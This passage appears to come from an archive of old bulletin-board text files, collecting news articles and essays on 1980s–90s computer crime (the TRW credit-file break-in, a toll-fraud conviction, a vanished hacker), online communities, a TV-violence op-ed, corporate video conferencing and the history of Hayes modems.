laws defining computer-related crimes and issues that need to be addressed.
     In addition, they believe law enforcement agents need to become better
educated about computers and how they work.  "That will make sure that not only
innocent people like Niedorf won't get charged in the future but will also
ensure that people who are committing the crimes and successfully investigated
and prosecuted," Zenner said.
     "The difficulty is that many times the [bulletin board] system
administrator doesn't exercise the kind of discipline on the board that lets
the investigators know with assurance that the information is limited solely to
one area," Cook said.  "Often a hacker will dump things into other people's
accounts.  In that case, the investigators, in order to seize the evidence, are
going to have to seize the entire memory of that computer operation."
     In contrast to a post office or printing plant, Cook said a personal
computer "is infinitely more flexible.  With computers you can store
information in numerous places, and there is a divergence of places where it
can be stored and dumped."
             COMPUTER RAIDERS HIT BIG CREDIT FILE
 
 
 
          06/22/84
 
             COMPUTER BUFFS USING HOME TERMINALS HAVE BROKEN INTO ONE
          OF THE LARGEST CONFIDENTIAL DATA FILES IN THE WORLD. THE TRW
          INFORMATION SERVICES DIVISION'S COMPUTERS HOLDING CREDIT
          HISTORIES OF 90 MILLION PEOPLE.
             THE SYSTEM WAS ENTERED AFTER SO-CALLED COMPUTER HACKERS
          GOT ACCESS TO A SECRET PASSWORD AND A MANUAL ON THE SYSTEM'S
          OPERATION. THE PASSWORD LEAKED OUT MORE THAT A YEAR AGO, BUT
          TRW OFFICIALS WERE NOT NOTIFIED UNTIL TWO WEEKS AGO.
             TRW INFORMATION SERVICES IS A CREDIT BUREAU THAT TRANSMITS
          OVER TELEPHONE LINES SUCH INFORMATION AS CREDIT HISTORIES,
          EMPLOYMENT RECORDS, BANKRUPTCIES, LOAN DELINQUENCIES AND
          SOCIAL SECURITY NUMBERS. THE SERVICE IS USED BY MORE THAN
          24,000 SUBSCRIBERS, INCLUDING BANKS AND DEPARTMENT STORES,
          AND CAN BE REACHED FROM MORE THAN 35,000 LOCATIONS.
             TRW OFFICIALS SAID THAT ALTHOUGH THE BREAK-IN ALLOWED HOME
          COMPUTER USERS TO READ CONFIDENTIAL FILES, THOSE USERS WOULD
          NOT BE ABLE TO CHANGE THE FILES. CHANGES ARE SUBMITTED
          MONTHLY ON TAPE, AND FILES ARE NOT ALTERED THROUGH THE
          ON-LINE COMPUTER SYSTEM.
             TRW OFFICIALS SAID THE PASSWORD AND MANUAL WERE OBTAINED
          FROM A SEARS ROEBUCK STORE IN SACRAMENTO THAT SUBSCRIBES TO
          THE SYSTEM. COMPUTER BUFFS EVENTUALLY POSTED THE CODE NUMBER
          ON AN "ELECTRONIC BULLETIN BOARD," WHICH ANY HOME COMPUTER
          USER WITH THE RIGHT EQUIPMENT CAN READ BY USING A TELEPHONE.
          IT IS NOT KNOWN HOW MANY TIMES PEOPLE BROKE INTO THE TRW
          SYSTEM, BUT SOURCES SAID THAT IT HAS BEEN COMMON KNOWLEDGE
          FOR MONTHS AMONG MANY COMPUTER BUFFS THAT THE TRW FILES COULD
          BE ENTERED EASILY AND CREDIT RECORDS READ.
             THE BREACH WAS FIRST REPORTED BY NEWSDAY, WHICH QUOTED
          UNNAMED COMPUTER HACKERS AS SAYING THE TRW SYSTEM WAS ENTERED
          NOT ONLY TO READ CREDIT RECORDS, BUT ALSO TO "EXPEDITE CREDIT
          CARD FRAUD" BY FINDING OUT WHETHER A PERSON WHOSE CREDIT CARD
          WAS STOLEN HAD A LARGE CREDIT LIMIT.
             TRW SAID THE LEAKED PASSWORD HAS BEEN CHANGED AND THAT NO
          OTHER CODES ARE BELIEVED TO BA AVALIABLE TO HACKERS. THE
          NEWSDAY STORY, HOWEVER, QUOTED SOURCES WHO SAID THAT OTHER
          CODES THAT PROVIDE ACCESS TO OTHER TRW FILES ARE STILL
          CIRCULATING.
             REFERRING TO THE AMOUNT OF TIME IT TOOK TRW TO LEARN ABOUT
          THE PROBLEM, JEROME SALTZER, A SPECIALIST IN COMPUTER SYSTEMS
          AND COMMUNICATIONS AT THE MASSACHUSETTS INSTITUTE OF
          TECHNOLOGY, SAID, "THAT IS A DISTURBING . . . FAIRLY
          APPALLING AMOUNT OF TIME FOR SOMETHING LIKE THAT TO GO
          UNDETECTED. IF TRUE, IT SUGGESTS THAT THE COMPANY DOESN'T
          REGARD THIS INFORMATION AS VERY IMPORTANT TO PROTECT . . . .
          THEY ARE NOT VERY CONCERNED ABOUT PROTECTING PEOPLE'S
          PRIVACY." HE SAID THAT RELATIVELY SIMPLE MONITORING
          TECHNIQUES SHOULD PICK UP THAT KIND OF SECURITY BREACH
          RELATIVELY EARLY.
             COMPANY OFFICIALS SAID IT IS POSSIBLE THAT UNAUTHORIZED
          ACCESS COULD HAVE BEEN OBTAINED THROUGH A DEPARTMENT STORE
          LINE OR A SIMILAR LINE ON WHICH MANY REQUESTS FOR CREDIT
          INFORMATION ARE PLACED DAILY. ON SUCH A LINE, THEY SAID, A
          FEW EXTRA REQUESTS MIGHT NOT BE NOTICED.
             SALTZER SAID THAT A SYSTEM WITH 35,000 ACCESS POINTS IS
          DIFFICULT TO POLICE AND THAT ANYONE RUNNING SUCH A SYSTEM
          WITHOUT ELABORATE SECURITY PRECAUTIONS MUST ASSUME THAT A FEW
          OF THE THOUSANDS OF PEOPLE WHO HAVE ACCESS TO IT MIGHT SELL
          THE CODE OR OTHERWISE MISUSE THE SYSTEM.
             AMONG THE SECURITY MEASURES TRW COULD HAVE TAKEN ARE
          REQUIRING THE USER TO BE CALLED BACK AT A CERTAIN PHONE
          NUMBER BEFORE INFORMATION IS SENT; CHANGING SECRET CODES MORE
          OFTEN, AND INSTALLING DEVICES ON SYSTEM TELEPHONES THAT TRADE
          RECOGNITION SIGNALS WITH THE CENTRAL COMPUTER BEFORE
          INFORMATION IS SENT.
             A RECENT AMERICAN BAR ASSOCIATION STUDY FOUND THAT 27
          PERCENT OF THE 275 BUSINESSES AND PUBLIC AGENCIES IT POLLED
          HAD BEEN VICTIMS OF COMPUTER CRIME, SUFFERING LOSSES OF HALF
          A BILLION DOLLARS LAST YEAR.
             JONN    PARKER, A COMPUTER SECURITY EXPERT AT TRW
          INTERNATIONAL IN SENLO PARK, CALIF., SAID A ROUGH SURVEY HAS
          COUNTED ABOUT 1,400 COMPUTER CRIMES IN THE UNITED STATES OVER
          THE PAST TWO DECADES. HE SAID THAT MANY LARGE COMPUTERS
          HAVE INSTALLED SECURITY SYSTEMS, BUT THAT THERE IS A
          TRADE-OFF BETWEEN SECURITY AND THE COST AND CONVENIENCE OF
          USING A COMPUTER SYSTEM -- THE MORE SECURITY USED, THE
          COSTLIER AND MORE INCONVENIENT IT BECOMES.
             THE TRW SYSTEM USED TWO CODES, A SEVEN-DIGIT CODE TO
          IDENTIFY THE USER AND A SHORTER "SECRET PASSWORD," SOURCES
          SAID. THE FIRST CODE IS LESS GUARDED AND RELATIVELY EASY TO
          OBTAIN, AND THE SHORTER, "SECRET" CODE, THEY SAID, IS "FAR
          TOO EASY" TO CRACK.
             IF IT CANNOT BE SHOWN THAT THE TRW BREAK-INS WERE USED TO
          COMMIT FRAUD -- IF THEY WERE MERELY CURIOSITY TRIPS BY
          COMPUTER HACKERS -- THEN IT WOULD BE UNCLEAR WHETHER THEY
          WERE ILLEGAL, ACCORDING TO A COMPANY SPOKESMAN. THE COMPANY
          HAS BEEN AMONG THOSE SEEKING STRONGER LEGISLATION TO FIGHT
          COMPUTER CRIME.
             ABOUT 25 STATES HAVE COMPUTER CRIME LEGISALTION, BUT
          OBTAINING "UNAUTHORIZED ACCESS" TO CONFIDENTIAL INFORMATION
          IS CONSIDERED A CRIME IN ONLY A FEW.

 The following article is reprinted by permission from the
 opinion page of the Sunday, June 21, 1993 Orange County
 Register. Copyright (c) 1992 by J. Neil Schulman.  All
 other rights reserved.



                        TUBE SHOCKS

                     by J. Neil Schulman


      What does watching TV make you do?

      Since we live in a violent society, we're constantly
 hearing arguments that seeing TV violence, particularly as
 kids, desensitizes us so we accept real violence more
 offhandedly -- maybe it even triggers real violence.

      But TV also shows lots of hugging.  The standard plot
 for most family sitcoms is (1) Problem causes family
 members to get mad at one another; (2) Family members abuse
 each other in cute ways; (3) All is forgiven by end of show
 and everybody hugs.

     So television gives us a conflicting set of images:
 violence and hugging.

      Every popular medium has undergone the charge that it
 corrupts youth.  The novel was attacked, then movies,
 radio, comics, rock and roll, and now TV, music videos, and
 rap.  The theory behind the attacks is always the same: if
 Johnny commits a crime, he's not responsible and his
 parents are not responsible: Something Else is responsible.

      The problem in this society isn't the easy
 availability of drugs, or guns, or pornography, or
 television, although all are scapegoated.  All are mere
 inanimate things: they do only what we have them do.

      All supposedly scientific studies on the subject of TV
 violence "causing" real violence are based on a theory of
 cause-and-effect that is contrary to humans having
 the capability of making responsible, moral choices.

      But we are volitional beings by nature: we choose what
 we do and what we make ourselves.  You take two brothers
 from an identical lousy environment -- missing father,
 overworked mother, no money, rotten inner city
 neighborhood.  One brother joins a gang and has committed
 his first murder within a couple of years.  The other
 brother hides out from the gangs at the public library and
 learns to read out of boredom.  Because of reading, he
 manages to stay in school and takes a fast-food job while
 attending night college.

      Even if you postulate a deterministic model
 of human behavior, comparing two specific phenomena in
 isolation tells us nothing useful.  How can you isolate
 one specific set of television images from the effects of
 the other available images?  Further, how do you go inside
 the skulls of the people doing acts of violence and find
 out the actual causes, when even asking won't give you a
 sure answer?

      Serial killer Ted Bundy claimed in a final death-row
 interview that reading pornography made him do it.  But how
 did that screwed up psyche \know\ what was cause and what
 was effect?  It's just as likely that the same impulses
 that attracted him to pornography attracted him to violent
 acts, and there was a third (prior) cause.

      Studies linking TV violence with real violence try to
 reduce human behavior to stimulus and effect. It may work
 with rat psychology, but it doesn't work with human
 psychology.  We aren't robots which are programmed.  We
 learn, choose what we focus upon, change our minds, ignore
 what we don't like or believe, focus on what we like and
 believe.  If someone is prone to violence, then they will
 probably seek out and obtain violent images -- and if it
 isn't broadcast on TV, it will be sought and obtained
 otherwise.

      A mere statistical link between two phenomena -- TV
 and violence -- supposes a causal link which is unproven.
 It's just as likely that TV violence, by providing a
 catharsis to those who would otherwise commit real
 violence, prevents real violence.

      Furthermore, TV violence is almost always part of a
 morality play.  When criminals initiate violence on TV,
 cops use violence to make sure they don't get away with it.
 If TV drives home any lesson, it's that using violence for
 criminal purposes will bring you to a violent end.

      It's even more probable -- given that TV is demand-
 driven -- that the increase in real violence is the cause
 of the increase of violence on TV.  The more violence there
 is in real life, the more reason there is to portray it on
 news and other "non-fiction" programs, and the more demand
 there is from violence-interested individuals to see it
 portrayed.

      Showing that real violence causes TV violence is
 simple.  But statistical correlations between any two
 particular phenomena, in the absence of a valid theory of
 human nature, prove so little that one could just as easily
 come up with a plausible-sounding theory of how hugging on
 TV sitcoms causes real violence.

      Try this on for size.

      Johnny is a latch-key kid whose father beat him every
 night before the age of five, then abandoned him and
 Johnny's mother.  Johnny is left at home alone for hour
 upon hour, and watches TV.  Johnny is fascinated by the TV
 sitcoms which show functional families.  He watches them
 all: \Family Ties\, \The Cosby Show\, \Roseanne\, \Who's
 the Boss?\.  Over and over again, young Johnny sees these
 families hugging each other.

      He watches these scenes of family hugging for years,
 and they have a cumulative effect.  When Johnny is eleven-
 years-old, he's in a sporting goods store at a mall, when
 he sees a son hug his father, who has just bought the son a
 new baseball bat.

      Johnny goes over to the baseball bats, picks out a
 nice heavy one, then goes over to the son and smashes the
 bat into his head, fracturing his skull and instantly
 killing him.

      Now, what conclusions do we want to draw from this
 incident?

      1) Hugging on TV causes senseless violence, and the
 networks should be subject to greater regulation by the
 FCC.

      2) Baseball bats are dangerous and should require a
 fifteen-day waiting period and background check before they
 are sold, and they should never be allowed to be sold to
 minors.

      3) Johnny committed the act of violence because he was
 jealous that another boy had a father who loved him, which
 Johnny never had.  The trigger for the incident of
 violence, and the particular tool Johnny used to commit it,
 are more or less random.

      This is the sort of question that might appear on your
 average test in verbal logic to get a job.

      But I wonder how many members of Congress, or
 sociologists, or journalists -- or lobbyists against
 pornography, rock videos, guns and TV violence -- could
 pass such a test?

      If there is any valid criticism of TV, it's the same
 one that can be brought against drugs: both can be
 distractions designed to dull the pain of living in a
 stupid, painful, and hope-destroying society.  TV, not
 religion, is today's opiate of the masses.

      If you want to change TV, change the desire of the
 viewing public from distraction to intellectual
 stimulation.

      Or you can just change the channel.

                                  ##

 J. Neil Schulman is a novelist and screenwriter.  He lives in
 Los Angeles.

Programmed for Life and Death
by:  John Markoff

This spring a California man symbolically took his life by using a computer
program to seek out and destroy the contributions he had made over the years
to a continuing electronic conversation run by a computer group called the
Well.  Several weeks later, he followed this "virtual" suicide by killing
himself in the real world.
 
Blair Newman had been one of the most active members of the Well, a
five-year-old electronic community that is operated out of the offices of the
Whole Earth Review, a publisher in Sausalito, Calif., with roots in the
1960's counterculture.  Several thousand people in the Bay Area regularly use
their computers to call up the Well for an electronic, typewritten chat, and
they frequently meet face to face in more conventional gatherings.
 
Mr. Newman, a 43-year-old veteran of the personal computer industry, was such
an enthusiastic - some would say obsessive - user of the Well that many of
his friends knew him only electronically.  They describe him as a flamboyant
insomniac who could be counted on for stimulating and sometimes infuriating
late-night conversation.  But he was also known for bouts of depression.
 
After his simulated suicide in May, many members of the community dispatched
angry messages complaining that they had been wronged.  Some believed that
Mr. Newman's writings, stored on a computer disk, were the property of the
community and not his to destroy.
 
It was after this dispute, which lingered for several weeks, that Mr. Newman
took his life.
 
"For him to be done in the virtual world was to be done - period," said John
Perry Barlow, a participant in the group who is a lyricist for the Grateful
Dead.
 
some may take Mr. Newman's story as that of a disturbed computer addict who
used technology to withdraw from the world.  But others see the experience in
a different light, as a glimpse of a future in which computers change the way
people live and work, and ultimately the way they die.
 
In recent years computer networks have been emerging as a new kind of
community unlimited by geography.  While members can be spread across the
world, the ease of communication can engender an intimacy more akin to a
small 19th-century village than a 20th-century suburb.
 
Some sociologists see a dark side to all this.
 
"There is a notion of avoiding the here-and-now society," said Todd Gitlin, a
sociologist at the University of California at Berkeley.  "Part of what's
scary is that there is a blankness in here-and-now society that leads people
to prefer these virtual communities."
 
But others see the networks as a way to overcome the forced anonymity of
modern life.  While the telephone shrank the world by permitting
instantaneous one-to-one contact, and while radio and television have served
as a one-way medium to broadcast information to millions, the computer has
become a vehicle that allows hundreds of people of like values and interests
to come together in small groups.
 
Much of what has taken place was foreshadowed in a number of science fiction
novels written in the last 15 years.  In his 1981 novel "True Names" - which
has a small but devoted following among network enthusiasts - Vernor Vinge
describes a fictional world in which a small computer underground illicitly
occupies parts of a powerful global network.  IN the story, technology has
become so advanced that it is possible to stimulate highly realistic fantasy
worlds and move about and interact with people who may be located thousands
of miles away.
 
A computer-science graduate student has recently created a less elaborate
simulated universe called Tinymud, which exists within a nationwide computer
network called Internet.  A program permits dozens of people connected to the
network through personal computers or work stations to create simulated
personas and use them to explore a fantasy world that the players themselves
constantly recreate.
 
Similar to role-playing games like Dungeons & Dragons, the game lacks the
dazzling graphics associated with Mr. Vinge's story.  Tinymud's universe
consists entirely of written descriptions, and wandering through it is like
reading a novel - or like being a character in one.  And in a meta-fictional
twist, each player can also play author, adding new regions for other players
to explore.
 
IN recent months the game has become a fad on college campuses.  By signing
on to the network, one can travel through an interactive text filled with
details of the geography of the Boston area, or electronically visit the Yale
University campus.
 
In addition to shrinking distances and stretching imaginations, computer
networks also provide anonymity.  Such an environment can lead to behaviour
that would not be so readily tolerated in real life.  Recently, in a posting
on a computer network, a Wesleyan University student complained about sexual
harassment in the Tinymud game.
 
"Just because my character is female and has a vaguely attractive
description, and just because I choose to flirt with some people, some jerk
thinks my sexuality is public property," the student wrote.  (It is not known
whether the character's creator was male or female.)

Someday electronic communities could be futuristic, high-tech paradises. But
for now they function more as primitive societies, still groping for social
codes.
 
Mr. Barlow, the lyricist, said he once believed that computer conferences
would never become real communities until they could address sex and death in
ritual terms.
 
"Marriages and funerals are the binding ceremonies in real towns," he said,
"but they have a hard time happening among the disembodied."
 
In the case of Mr. Newman, his friends have tried to assuage their grief by
what may be the first electronic funeral.  Shortly after his death, they
created a new computer file including all of his old writings, which, it
turns out, had been saved on a backup disk.  They have also compiled a
eulogy, hundreds of pages of testimonials available on the system.  Included
is this observation from Mitchell D. Kapor, the founder of the Lotus
Development Corporation and now chairman of On Technology:

"He was a unique character, and perhaps the limitations of space and time
were just too much for someone with so many ideas and inspirations."

---------------------------------------------------------------------------- 
The above article was found in the New York Times some time in November 1990,
and brought to my attention by Victoria, of The Pinnacle Club BBS.  It seems
to me to have enough relevance to our situation, using Bulletin Boards in New
Zealand, to be worth spending a little while typing it in.
----------------------------------------------------------------------------
 Bernadette Mooney - SysOp - The Pinnacle Club BBS - Auckland - New Zealand
----------------------------------------------------------------------------

THE HACKER WHO VANISHED

Suicide or clever hoax?

   Early one morning last September, a pair of California computer whizzes
were doing what hackers like to do best:  peering at a glowing terminal,
hacking away at a programs and talking about the books and movies they might
someday write about their electronic exploits.  Tom Anderson, 16, paused to
take a shower.  "When I came out," recalls Anderson, who had left his friend,
Bill Landreth, busily pounding away at the keyboard, "he was gone.  And I
haven't seen him since."

    Landreth's disappearance from Escondido, a suburb of San diego, is of
concern to more than his family and friends.  Three years ago, Landreth--
whose IQ measured 163 and who was only 19 at the time--was convicted of wire
fraud after he tapped into a GTE electronic-mail service whose clients
included NASA and the Defense Department.  Landreth passed the access code
along to other hackers; soon computer users around the country were using the
GTE lines for free. But since Landreth (known to other hackers as "THE
CRACKER" from the book INNER CIRCLE) hadn't altered any message or stolen any
money, the judge let him off with three years' probation.  Landreth later
capitalized on his notoriety by writing a book about breaking through computer
security screens and by advising businesses on how to protect their system
against the type of intrusion that got him in trouble.  But by disappearing,
Landreth broke his probation terms and is now being sought by U.S. marshals.

    The hacker's friends doubt that he is on the lam.  "It's not unusual for
him to disappear," says Jenny Perkes, a former girlfriend.  Indeed Anderson
remembers that Landreth liked to cultivate an air of mystery and recently had
taken off to Mexico and later Sweden without telling anyone, returning a week
later as if he had just been to the corner store. But Landreth has never
before been gone for such a long period; and this time he vanished without
leaving money for rent--a discourtesy that friends say is totally out of
character.  "He was a gentleman, a very thoughtful person, very generous,"says
Perkes.

    Landreth left something esle behind, however: a rambling eight-page letter
that only added to the mystery.  Landreth apparently wrote the letter, which
was addressed to no one and left in his room, during a period last summer when
friends say he appeared depressed.  The rambling discourse touches on such
topics as evolution, nuclear war, society's greed, computers becoming more
important than man,the meaning of existence and, ulitmately, suicide.  "The
idea is that I will commit suicde sometime around my 22nd birthday <sic>,"
the note said.  "This will have given me 22 or so years with which to convince
myself that life really isn't worth living."  Landreth's 22nd birthday was
Dec. 26.  Anderson, for one expects never to hear from his friend again.

    Cryptic message:  But Landreth's apparent suicide note had an escape
clause.  Some months after typing the suicide reference, he added the words:
"Since writing the above, my plans have changed slightly.  I am going to take
this money I have left...and make a final attempt at making life worthy.  It
will be a short attempt, and I do suspect that if it works out that none of my
friends will know me then.  If it dosen't work out, the news of my death will
probably get around (I won't try to hide it)."

    Does Landreth's note reflect a troubled youth contemplating suicide or an
adventure-loving computer genius playing an elaborate real-life Dungeons &
Dragons like game on his friends?  So far, neither the police nor the federal
marshals nor his friends have been able to crack the mystery of the hacker who
one day disappeared leaving no trace than a computer deleted sentence.

George Hackett with Hilliard Harper in San Diego



VIDEO CONFERENCING

BEN & JERRY'S SAVES MONEY, ADVANCES OFF-BEAT 
CORPORATE CULTURE

Clear-channel T-1 video conferencing service links company 
sites

Where else but at Ben & Jerry's Ice Cream would you find a 
"Communications Queen?" What other corporate headquarters
features blue jeans as the style of choice? And where else 
would you find people actually having -- brace yourself -- 
fun with their video conferencing system? OK, where else 
outside of California?

The fact is, employees at Ben & Jerry's corporate 
headquarters in Waterbury, Vermont and their colleagues at 
the company's Springfield, Vermont manufacturing site some 
74 miles away, have time for fun because their serious 
video conferencing time is so productive.


The system, which is based on PictureTel hardware and a 
New England Telephone Superpathsm 1.5M bps T-1 line, provides 
special advantages for a company based in such a rural and 
rugged location.

"Video conferencing allows us to meet more frequently
without interrupting our schedules," says Communications 
Coordinator (a.k.a."Communications Queen") Maureen Martin. 
"And, as we get into winter, it will get used even more, 
helping us avoid the drive between Waterbury and Springfield, 
which is about an hour-and-a-half."

LIVE, FROM "THE FOOTBALL FIELD"

A typical Ben & Jerry's video conference includes between 10 
and 13 people. However, sometimes high-ranking company 
officials will use the system for one-on-one meetings. 
Although two rooms at the Waterbury headquarters site are 
wired for video conferencing, the conference room (referred 
to affectionately as "The Football Field"), with its circular 
tables and room-length "white board" is the site of choice.


There are two cameras in the room. One is fixed on top of 
one of the system's 32-inch monitors, and the other sits on
a tripod that can be automatically moved to focus on fixed 
settings such as the white board or speakers. The monitor has 
a small "window" that allows the transmitting site to see 
what's coming out at the other end. There are no special 

unit's keyboard, from which it comfortably picks up commentary 
from anyplace in the room.

The system uses a clear-channel T-1 configuration, which 
allocates 64K bps for each of the 12 channels dedicated to
video transmission. Another 10 of the remaining 12 channels 
are used as voice tie lines between the two locations.

According to telecommunications specialist Melody Plante, 
"Another channel is used to transmit data, eliminating the
dedicated 56K bps line we had. We're leaving the last channel 
open, anticipating future growth."


THE VIRTUAL OFFICE IS CREATED

On the voice side of this configuration, the Springfield 
location is a virtual extension of the Waterbury site, 
meaning there are no toll charges for calls made between 
them. This also means anyone at the Waterbury site can be 
paged from Springfield. This virtual extension also creates 
a phone-mail system between the two sites.

Plante says that an initial bandwidth problem was solved when 
New England Telephone agreed to supply the clear-channel T-1 
link. Beyond that, the major obstacles consisted of getting 
all the participating vendors to decide on dip switch settings 
and video parameters. Those vendors included New England 
Telephone, PictureTel, GTE, the Southern Vermont Telephone 
Company and Telesource, a muliplexer manufacturer.

Plante lauds the role played by New England Telephone
technicians, who acted as "testers." "All the vendors relied 
heavily on New England Telephone," Plante states. "They were 
great."


Savings accumulated via reduced toll and private line charges 
will enable the multiplexer unit, which was installed during 
March of 1992, to pay for itself within 14 months. The 
system's value increases even more when time and travel 
expenses are factored in.

POSSIBLE BOSTON CONNECTION

Martin says the Ben & Jerry's video conference system will 
reach out beyond Vermont. "Eventually, we will want to hook
up with outside video conference users, such as our attorneys 
in Boston," she notes.

A visitor need not go beyond the reception area of the 
Waterbury headquarters building to get, ahem, a flavor of 
the Ben & Jerry's corporate culture.  Every wall is plastered 
with some brightly colored piece of Ben & Jerry's bric-a-brac.




The video conferencing system can be an inadvertent 
purveyor of this color culture. "One time when we got done 
with a conference, somebody in Springfield noticed that we 
had a new promotional piece on the table," Martin remembers. 
"It had just come out that morning, but they wanted to get it 
as soon as possible."

And just where does the fun, what is known within the company
as "Ben & Jerry-izing" it, come in? Although such activitiies
are not yet observed on a company-wide basis via video 
conferencing, "We've done everything from Barry Manilow's 
birthday to Elvis day,"  Martin observes. It seems only 
fitting that the Queen of Telecommunications would commemorate 
the King of Rock and Roll.  


From: rice@ttd.teradyne.com
Subject: Virgin Islands Phreak Arrested and Convicted
Organization: Teradyne Inc., Telecommunications Division
Date: Sat, 23 May 92 18:03:55 GMT


With the on-going discussion of the 'legalities' of unauthorized use
of long distance access codes (or phone credit card numbers), the
following is forwarded from alt.ham.radio, as it might be of interest
to readers.  Apparently you don't have to be 'caught with the card' so
to speak, to be found guilty of toll fraud using un-lawfully obtained
access numbers.

Additional details of this story have been published a number of places.

                ---------------------------

[relayed from packet]

 Msg #1083  
 From: KZ1D  
 Date: 15-May 0309Z  
 Subj: The Compleate KV4FZ (1)

OK, you asked for it, and here it is!  The WHOLE, unexpungatetd (sp?)
article as it appeared in the May 15 W5YI Report ...
 
KV4FZ: GUILTY OF TELEPHONE TOLL FRAUD
 
St. Croix ham operator, Herbert L. "Herb" Schoenbohm, KV4FZ, has been
found guilty in federal court of knowingly defrauding a Virgin Islands
long-distance telephone service reseller.  He was convicted April 24th
of possessing and using up to fifteen unauthorized telephone access
devices in interstate and foreign commerce nearly five years ago.
 
The stolen long distance telephone access codes belonged to the
Caribbean Automated Long Lines Service, Inc. (CALLS) of St. Thomas,
U.S. Virgin Islands.  Schoenbohm was found to have made more than
$1,000 in unauthorized telephone calls -- although the prosecution
said he was responsible for more (make that far more).
 
According to the {Virgin Islands Daily News}, Schoenbohm, who is also
the St. Croix Police Chief of Communications, showed no emotion when
he was pronounced guilty of the charges by a 12 member jury in U.S.
District Court in Christiansted.  The case was heard by visiting
District Judge Anne Thompson.
 
Neither Schoenbohm or his defense attorney, Julio Brady, would comment
on the verdict.  The jury deliberated about seven hours.  The
sentencing, which has been set for June 26, 1992, will be handled by
another visiting judge not familiar with the case.
 
Schoenbohm, who is Vice Chairman of the V.I. Republican Committee, has
been released pending sentencing although his bail was increased from
$5,000 to $25,000.  While he could receive a maximum of ten years on
each count, Assistant U.S. Attorney Alphonse Andrews said Schoenbohm
probably will spend no more than eight months in prison since all
three counts are similar and will be merged.
 
Much of the evidence on the four day trial involved people who
received unauthorized telephone calls from KV4FZ during a 1987 period
recorded by the CALLS computer.  Since the incident took place more
than five years ago, many could not pinpoint the exact date of the
telephone calls.
 
The prosecution produced 20 witnesses from various U.S locations,
including agents from the Secret Service, the U.S. Marshals Service,
Treasury Dept. and Federal Communications Commission.  In addition
ham operators testified for the prosecution.
 
Schoenbohm was portrayed as a criminal who had defrauded CALLS out of
hundreds of thousands of dollars.  Schoenbohm admitted using the
service as a paying customer, said it did not work and that he
terminated the service and never used it again.  He feels that there
was much political pressure to get him tried and convicted since he
had been writing unfavorably articles about Representative DeLugo, a
non-voting delegate to Congress from the Virgin Islands, including his
writing of 106 bad checks during the recent rubbergate scandal.
 
Most, but not all the ham operators in attendance were totally opposed
to KV4FZ.  Bob Sherrin, W4ASX from Miami attended the trial as a
defense character witness.  Sherrin told us that he felt the
conviction would be overturned on appeal and that Schoenbohm got a raw
deal.  "They actually only proved that he made $50 in unauthorized
calls but the jury was made to believe it was $1,000."
 
Schoenbohm's attorney asked for a continuance due to newly discovered
evidence but that was denied.  There also is a question as to whether
the jury could even understand the technology involved.  "Even his own
lawyer couldn't understand it, and prepared an inept case," Sherrin
said.  "I think he was railroaded.  They were out to get him.  There
were a lot of [ham] net members there and they were all anti-Herb
Schoenbohm.  The only people that appeared normal and neutral were the
FCC.  The trial probably cost them a million dollars.  All his enemies
joined to bring home this verdict."
 
Schoenbohm had been suspended with pay from the police department job
since being indicted by the St. Croix grand jury.  His status will be
changed to suspension without pay if there is an appeal.  Termination
will be automatic if the conviction is upheld.  Schoenbohm's wife was
recently laid off from her job at Pan Am when the airline closed down.
Financially, it could be very difficult for KV4FZ to organize an
appeal with no money coming in.
 
The day after the KV4FZ conviction, Schoenbohm who is the Republican
Committee vice chairman was strangely named at a territorial
convention as one of eight delegates to attend the GOP national
convention in Houston this August.  He was nominated at the caucus
even though his felony conviction was known to everyone.  Schoenbohm
had even withdrawn his name from consideration since he was now a
convicted felon.
 
The {Virgin Island Daily News} later reported that Schoenbohm will not
be attending the GOP national convention. "Schoenbohm said he came to
the conclusion that my remaining energies must be spent in putting my
life back together and doing what I can to restore my reputation.  I
also felt that any publicity in association with my selection may be
used by critics against the positive efforts of the Virgin Islands
delegation."
 
Schoenbohm has been very controversial and vocal on the ham bands.
Some ham operators now want his amateur radio license pulled -- and
have made certain that the Commission is very much aware of his
conviction.
 

John Rice         K9IJ    |  "Did I say that ?" I must have, but It was
rice@ttd.teradyne.com     |   MY opinion only, no one else's...Especially
(708)-940-9000 - (work)   |   Not my Employer's....
(708)-438-7011 - (home) 
The Rise and Fall of the Modem King
International Herald Tribune
By Victoria Shannon

               The Rise and Fall of the Modem King

      By Victoria Shannon     International Herald Tribune

PARIS -  In a field in which everything is focused on the future,
on how fast and smart and cool technology will be in just a
couple of months or years - just you wait and see - sometimes we
need to pause for a little history lesson.

This one is about a modest-sized company based in the Atlanta
suburb of Norcross, Georgia, a business called Hayes Corp. If
you're on the Internet, you probably have this company to thank
for it: Hayes - or rather, its founder, Dennis Hayes - invented
both the personal-computer modem and some of the basic standards
that all of today's modems still answer to, according to the
company and on-line experts. Even if you've never bought anything
from the company, you may know the Hayes name from two distinct
places: on the box of the external modem you buy, describing it
as "Hayes-compatible," or from the list of modem settings your
communications software offers.

On the surface, at least, Hayes's tale appears to debunk at least
two clichs: that lightning doesn't strike the same place twice,
and that we learn from our mistakes.

But first, a look back. Dennis Hayes, the chronicles tell us,
left the Georgia Institute of Technology in the mid-1970s to work
at a company called National Data Corp. It was there that he
realized the need to make modems that could be configured with
software to respond to various orders, such as "answer on first
ring." That would be a better way than building those different
responses into the hardware, which would require that there be
many different kinds of modems.

He and a partner created the first circuit boards imbued with
that ideal in 1977 - not in his garage, as legends dictate, but
close: on the dining-room table in his home.

-

HAYES MICROCOMPUTER Products Inc. was founded with a $5,000
investment in January 1978, and Mr. Hayes went on to become the
modem king, far surpassing any rival in sales and having his
name forever associated with any modem sold to the masses.

The modem brands by which you may know him today are Optima,
Accura, Practical Peripherals and Century. The commands by
which you may know him begin with "AT" in your software's
initialization string.

Last autumn, the company marked 20 years as a pioneer in two
ways: by selling special 20th-anniversary modems signed by
Mr. Hayes himself and by filing for bankruptcy-court protection.

Alas, it was the second time in three years that the first name
in modems had had to seek refuge in bankruptcy court. The
lightning bolt of financial and management troubles had struck
again.

But Hayes is also a case study in yet another maxim: Getting
there first or best does not guarantee success. Just look at
International Business Machines Corp. (first out with the
personal computers that are today's "WinTel" standard). Or
Apple Inc. (best, with its Macintosh line). Why does this happen?

Some say the egos of pioneers subsume their better business
judgments. Some blame unique intersections of events and
circumstances.

In Hayes's case, the company apparently had manufacturing
problems and other production snafus that left it in the lurch
the first time it filed for bankruptcy protection.

-

The second time, the company said it was a victim of a cash
shortage caused by stagnant sales that had plagued all modem
makers in the transition from 33,600 bits-per-second speeds to
56k.

Asia, too, before its recession, was a strong market for Hayes,
and its economic collapse reverberated in the company. But Hayes
was still the No. 2 seller of modems, behind - though far behind
